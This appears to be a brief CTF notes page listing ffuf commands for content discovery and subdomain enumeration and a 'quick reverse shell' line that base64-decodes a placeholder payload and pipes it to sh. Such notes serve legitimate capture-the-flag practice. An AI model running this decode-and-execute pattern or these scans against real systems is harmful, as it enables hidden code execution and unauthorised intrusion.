Useful websites and materials

This page contains useful websites and commands for carrying out CTF

Useful websites


Content Discovery

ffuf -w common.txt -u http://MACHINE_IP/FUZZ

Subdomain enumeration

ffuf -w DNS/namelist.txt -H "Host: FUZZ.DOMAIN.NAME" -u http://MACHINE

Quick reverse shell

echo "<PayloadBASE64>" | base64 -d | sh

Last updated